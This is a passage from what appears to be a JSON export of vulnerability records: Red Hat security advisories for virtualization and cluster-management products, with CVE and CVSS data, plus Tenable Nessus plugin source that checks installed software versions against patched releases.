monitoring the host's resources and performing administrative tasks. \n\nThe ovirt-node-ng packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.\n\nThe following packages have been upgraded to a later upstream version: cockpit-ovirt (0.14.15), redhat-release-virtualization-host (4.4.3), redhat-virtualization-host (4.4.3), v2v-conversion-host (1.16.2). (BZ#1898023, BZ#1902301, BZ#1907539)\n\nSecurity Fix(es):\n\n* lldpd: buffer overflow in the lldp_decode function in daemon/protocols/lldp.c (CVE-2015-8011)\n\n* nodejs-lodash: prototype pollution in zipObjectDeep function (CVE-2020-8203)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Previously, upgrade from Red Had Virtualization (RHV) 4.4.1 to RHV 4.4.2 failed due to dangling symlinks from the iSCSI Storage Domain that weren't cleaned up. In this release, the upgrade succeeds. (BZ#1895356)\n\n* Previously, when migrating a Windows virtual machine from a VMware environment to Red Hat Virtualization 4.4.3, the migration failed due to a file permission error. In this release, the migration succeeds. (BZ#1901423)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-17T08:43:33", "type": "redhat", "title": "(RHSA-2020:5611) Important: Red Hat Virtualization security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8011", "CVE-2020-8203"], "modified": "2020-12-17T08:55:20", "id": "RHSA-2020:5611", "href": "https://access.redhat.com/errata/RHSA-2020:5611", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:40:53", "description": "The ovirt-web-ui package provides the web interface for Red Hat Virtualization.\n\nSecurity Fix(es):\n\n* nodejs-lodash: prototype pollution in defaultsDeep function leading to modifying properties (CVE-2019-10744)\n\n* bootstrap: XSS in the tooltip or popover data-template attribute (CVE-2019-8331)\n\n* js-jquery: prototype pollution in object's prototype leading to denial of service or remote code execution or property injection (CVE-2019-11358)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Known moderate severity security vulnerability detected by GitHub on ovirt-web-ui components (BZ#1694032)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2019-10-10T14:49:46", "type": "redhat", "title": "(RHSA-2019:3024) Moderate: ovirt-web-ui security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744", "CVE-2019-11358", "CVE-2019-8331"], "modified": "2019-10-10T15:28:19", "id": "RHSA-2019:3024", "href": "https://access.redhat.com/errata/RHSA-2019:3024", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-10-19T20:39:13", "description": "The org.ovirt.engine-root is a core component of oVirt.\n\nThe following packages have been upgraded to a later upstream version: engine-db-query (1.6.2), org.ovirt.engine-root (4.4.3.8), ovirt-engine-dwh (4.4.3.1), ovirt-engine-extension-aaa-ldap (1.4.2), ovirt-engine-extension-logger-log4j (1.1.1), ovirt-engine-metrics (1.4.2.1), ovirt-engine-ui-extensions (1.2.4), ovirt-log-collector (4.4.4), ovirt-web-ui (1.6.5), rhv-log-collector-analyzer (1.0.5), rhvm-branding-rhv (4.4.6). (BZ#1866981, BZ#1879377)\n\nSecurity Fix(es):\n\n* nodejs-handlebars: lookup helper fails to properly validate templates allowing for arbitrary JavaScript execution (CVE-2019-20920)\n\n* nodejs-handlebars: an endless loop while processing specially-crafted templates leads to DoS (CVE-2019-20922)\n\n* nodejs-lodash: prototype pollution in zipObjectDeep function (CVE-2020-8203)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* send --nowait to libvirt when we collect qemu stats, to consume bz#1552092 (BZ#1613514)\n\n* Block moving HE hosts into different Data Centers and make HE host moved to different cluster NonOperational after activation (BZ#1702016)\n\n* If an in-use MAC is held by a VM on a different cluster, the engine does not attempt to get the next free MAC. (BZ#1760170)\n\n* Search backend cannot find VMs which name starts with a search keyword (BZ#1797717)\n\n* [Permissions] DataCenterAdmin role defined on DC level does not allow Cluster creation (BZ#1808320)\n\n* enable-usb-autoshare is always 0 in console.vv and usb-filter option is listed two times (BZ#1811466)\n\n* NumaPinningHelper is not huge pages aware, denies migration to suitable host (BZ#1812316)\n\n* Adding quota to group doesn't propagate to users (BZ#1822372)\n\n* Engine adding PCI-E elements on XML of i440FX SeaBIOS VM created from Q35 Template (BZ#1829691)\n\n* Live Migration Bandwidth unit is different from Engine configuration (Mbps) and VDSM (MBps) (BZ#1845397)\n\n* RHV-M shows successful operation if OVA export/import failed during \"qemu-img convert\" phase (BZ#1854888)\n\n* Cannot hotplug disk reports libvirtError: Requested operation is not valid: Domain already contains a disk with that address (BZ#1855305)\n\n* rhv-log-collector-analyzer --json fails with TypeError (BZ#1859314)\n\n* RHV 4.4 on AMD EPYC 7742 throws an NUMA related error on VM run (BZ#1866862)\n\n* Issue with dashboards creation when sending metrics to external Elasticsearch (BZ#1870133)\n\n* HostedEngine VM is broken after Cluster changed to UEFI (BZ#1871694)\n\n* [CNV&RHV]Notification about VM creation contain <UNKNOWN> string (BZ#1873136)\n\n* VM stuck in Migrating status after migration completed due to incorrect status reported by VDSM after restart (BZ#1877632)\n\n* Use 4.5 as compatibility level for the Default DataCenter and the Default Cluster during installation (BZ#1879280)\n\n* unable to create/add index pattern in step 5 from kcs articles#4921101 (BZ#1881634)\n\n* [CNV&RHV] Remove warning about no active storage domain for Kubevirt VMs (BZ#1883844)\n\n* Deprecate and remove ovirt-engine-api-explorer (BZ#1884146)\n\n* [CNV&RHV] Disable creating new disks for Kubevirt VM (BZ#1884634)\n\n* Require ansible-2.9.14 in ovirt-engine (BZ#1888626)\n\nEnhancement(s):\n\n* [RFE] Virtualization support for NVDIMM - RHV (BZ#1361718)\n\n* [RFE] - enable renaming HostedEngine VM name (BZ#1657294)\n\n* [RFE] Enabling Icelake new NIs - RHV (BZ#1745024)\n\n* [RFE] Show vCPUs and allocated memory in virtual machines summary (BZ#1752751)\n\n* [RFE] RHV-M Deployment/Install Needs it's own UUID (BZ#1825020)\n\n* [RFE] Destination Host in migrate VM dialog has to be searchable and sortable (BZ#1851865)\n\n* [RFE] Expose the \"reinstallation required\" flag of the hosts in the API (BZ#1856671)", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:L", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.3}, "published": "2020-11-24T12:30:25", "type": "redhat", "title": "(RHSA-2020:5179) Low: Red Hat Virtualization security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20920", "CVE-2019-20922", "CVE-2020-8203"], "modified": "2020-11-24T12:51:11", "id": "RHSA-2020:5179", "href": "https://access.redhat.com/errata/RHSA-2020:5179", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-11-16T15:21:52", "description": "The ovirt-engine package provides the Red Hat Virtualization Manager, a centralized management platform that allows system administrators to view and manage virtual machines. The Manager provides a comprehensive range of features including search capabilities, resource management, live migrations, and virtual infrastructure provisioning.\n\nSecurity Fix(es):\n\n* follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor (CVE-2022-0155)\n\n* ovirt-engine: RHVM admin password is logged unfiltered when using otopi-style (CVE-2022-2805)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Ghost OVFs are written when using floating SD to migrate VMs between 2 RHV environments. (BZ#1705338)\n\n* RHV engine is reporting a delete disk with wipe as completing successfully when it actually fails from a timeout. (BZ#1836318)\n\n* [DR] Failover / Failback HA VM Fails to be started due to 'VM XXX is being imported' (BZ#1968433)\n\n* Virtual Machine with lease fails to run on DR failover (BZ#1974535)\n\n* Disk is missing after importing VM from Storage Domain that was detached from another DC. (BZ#1983567)\n\n* Unable to switch RHV host into maintenance mode as there are image transfer in progress (BZ#2123141)\n\n* not able to import disk in 4.5.2 (BZ#2134549)\n\nEnhancement(s):\n\n* [RFE] Show last events for user VMs (BZ#1886211)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-11-16T12:07:06", "type": "redhat", "title": "(RHSA-2022:8502) Moderate: RHV Manager (ovirt-engine) [ovirt-4.5.3] bug fix and security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0155", "CVE-2022-2805"], "modified": "2022-11-16T12:07:24", "id": "RHSA-2022:8502", "href": "https://access.redhat.com/errata/RHSA-2022:8502", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-09-07T20:04:55", "description": "Red Hat Advanced Cluster Management for Kubernetes 2.3.10 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in.\n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which fix several bugs. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/\n\nSecurity updates:\n\n* Follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor (CVE-2022-0155)\n\n* Node-fetch: exposure of sensitive information to an unauthorized actor (CVE-2022-0235)\n\n* Follow-redirects: Exposure of Sensitive Information via Authorization Header leak (CVE-2022-0536)\n\n* Urijs: Authorization Bypass Through User-Controlled Key (CVE-2022-0613)\n\n* Urijs: Leading white space bypasses protocol validation (CVE-2022-24723)\n\n* Nconf: Prototype pollution in memory store (CVE-2022-21803)\n\n* Moment.js: Path traversal in moment.locale (CVE-2022-24785)\n\nBug fixes:\n\n* RHACM 2.3.10 images", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-04T21:09:57", "type": "redhat", "title": "(RHSA-2022:1715) Moderate: Red Hat Advanced Cluster Management 2.3.10 security updates and bug fixes", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-25032", "CVE-2021-4028", "CVE-2021-4083", "CVE-2021-4115", "CVE-2022-0155", "CVE-2022-0235", "CVE-2022-0536", "CVE-2022-0613", "CVE-2022-0711", "CVE-2022-1154", "CVE-2022-1271", "CVE-2022-21803", "CVE-2022-24723", "CVE-2022-24785", "CVE-2022-25636"], "modified": "2022-05-04T21:10:15", "id": "RHSA-2022:1715", "href": "https://access.redhat.com/errata/RHSA-2022:1715", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T14:55:59", "description": "WordPress versions 5.8 < 5.8.1 / 5.7 < 5.7.3 / 5.6 < 5.6.5 / 5.5 < 5.5.6 / 5.4 < 5.4.7 / 5.2 < 5.2.12 are affected by one or more vulnerabilities", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-09T00:00:00", "type": "nessus", "title": "WordPress 5.8 < 5.8.1 / 5.7 < 5.7.3 / 5.6 < 5.6.5 / 5.5 < 5.5.6 / 5.4 < 5.4.7 / 5.2 < 5.2.12", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-23337"], "modified": "2022-01-19T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "WORDPRESS_5_8_1.NASL", "href": "https://www.tenable.com/plugins/nessus/153173", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\n# The descriptive text and package checks in this plugin were\n# extracted from WordPress Security Advisory wordpress-5-8-1-security-and-maintenance-release.\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153173);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/19\");\n\n script_cve_id(\"CVE-2020-28500\", \"CVE-2021-23337\");\n script_xref(name:\"IAVA\", value:\"2021-A-0410-S\");\n\n script_name(english:\"WordPress 5.8 < 5.8.1 / 5.7 < 5.7.3 / 5.6 < 5.6.5 / 5.5 < 5.5.6 / 5.4 < 5.4.7 / 5.2 < 5.2.12\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PHP application running on the remote web server is affected by one or more vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"WordPress versions 5.8 < 5.8.1 / 5.7 < 5.7.3 / 5.6 < 5.6.5 / 5.5 < 5.5.6 / 5.4 < 5.4.7 / 5.2 < 5.2.12 are affected by\none or more vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wordpress.org/download/releases/\");\n # https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8c25d82d\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wordpress.org/support/wordpress-version/version-5-8-1/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to WordPress version 5.8.1, 5.7.3, 5.6.5, 5.5.6, 5.4.7, 5.2.12 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-23337\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/09\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"www/PHP\", \"installed_sw/WordPress\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar app = 'WordPress';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar port = get_http_port(default:80, php:TRUE);\n\nvar app_info = vcf::get_app_info(app:'WordPress', port:port, webapp:TRUE);\n\nvar constraints = [\n { 'min_version' : '5.2', 'fixed_version' : '5.2.12' },\n { 'min_version' : '5.4', 'fixed_version' : '5.4.7' },\n { 'min_version' : '5.5', 'fixed_version' : '5.5.6' },\n { 'min_version' : '5.6', 'fixed_version' : '5.6.5' },\n { 'min_version' : '5.7', 'fixed_version' : '5.7.3' },\n { 'min_version' : '5.8', 'fixed_version' : '5.8.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, flags:{'xss':TRUE});\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-04T14:42:39", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2021:2179 advisory.\n\n - nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions (CVE-2020-28500)\n\n - nodejs-lodash: command injection via template (CVE-2021-23337)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-01T00:00:00", "type": "nessus", "title": "RHEL 8 : RHV Manager security update (ovirt-engine) [ovirt-4.4.6] (Moderate) (RHSA-2021:2179)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-23337"], "modified": "2023-02-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-ui-extensions", "p-cpe:/a:redhat:enterprise_linux:ovirt-web-ui"], "id": "REDHAT-RHSA-2021-2179.NASL", "href": "https://www.tenable.com/plugins/nessus/150124", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:2179. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150124);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/02\");\n\n script_cve_id(\"CVE-2020-28500\", \"CVE-2021-23337\");\n script_xref(name:\"RHSA\", value:\"2021:2179\");\n\n script_name(english:\"RHEL 8 : RHV Manager security update (ovirt-engine) [ovirt-4.4.6] (Moderate) (RHSA-2021:2179)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:2179 advisory.\n\n - nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions (CVE-2020-28500)\n\n - nodejs-lodash: command injection via template (CVE-2021-23337)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-28500\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-23337\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:2179\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1928937\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1928954\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ovirt-engine-ui-extensions and / or ovirt-web-ui packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-23337\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(78, 400);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-ui-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-web-ui\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/layered/rhel8/x86_64/rhv-manager/4.4/debug',\n 'content/dist/layered/rhel8/x86_64/rhv-manager/4.4/os',\n 'content/dist/layered/rhel8/x86_64/rhv-manager/4.4/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'ovirt-engine-ui-extensions-1.2.6-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-web-ui-1.6.9-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = 